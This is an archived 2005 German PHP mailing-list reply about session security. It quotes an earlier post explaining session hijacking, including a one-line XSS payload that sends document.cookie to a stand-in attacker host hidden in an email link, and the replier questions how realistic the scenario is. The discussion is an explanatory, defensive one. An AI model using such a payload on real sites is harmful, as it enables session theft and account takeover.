phpbar.de - Mailinglisten-Archive

Mailinglisten-Archive

[php] Zeitkontrolle

Stefan Brueckmann liste at trick-box.de
Mit Okt 12 14:58:09 CEST 2005

Vorherige Nachricht: [php] Zeitkontrolle
Nächste Nachricht: [php] Zeitkontrolle
Nachrichten sortiert nach: [ Datum ] [ Thema ] [ Betreff (Subject) ] [ Autor ]

Hallo Peter Prochaska,

am Mittwoch, 12. Oktober 2005 13:59 schriebst du:

> Einfaches Beispiel:
> 1. Ein Nutzer deiner Applikation loggt sich ein und erhält ein
> Session Cookie. In diesem Cookie steht nun die Session-ID von PHP.
>
> 2. Ein böser Bube schreibt eine HTML-Mail an eben diesen Nutzer und
> versteckt darin den Link
> www.test.de/index.php"><script>this.location.href='http://www.boese
>r-server.de/?cookie='+document.cookie</script>< Durch die
> Möglichkeiten die man in HTML hat, kann man den Link ja anders
> anzeigen lassen, z.B. "Hier gehts zum Gewinnspiel".

Kannst du uns auch  verraten wie der Böse Bube mitbekommt das sein 
Empfänger irgendwo eingeloggt ist?
Oder warum die Leute, währen sie in meinem genialen Webfrontend 
eingeloggt, sind noch Zeit haben E-mail zu beantworten?
;-)


Alles Gute
Stefan

-- 
Wer die bessere Einsicht hat, darf sich nicht scheuen, unpopulär zu 
werden.
Winston Churchill

Vorherige Nachricht: [php] Zeitkontrolle
Nächste Nachricht: [php] Zeitkontrolle
Nachrichten sortiert nach: [ Datum ] [ Thema ] [ Betreff (Subject)] [ Autor ]

php::bar PHP Wiki - Listenarchive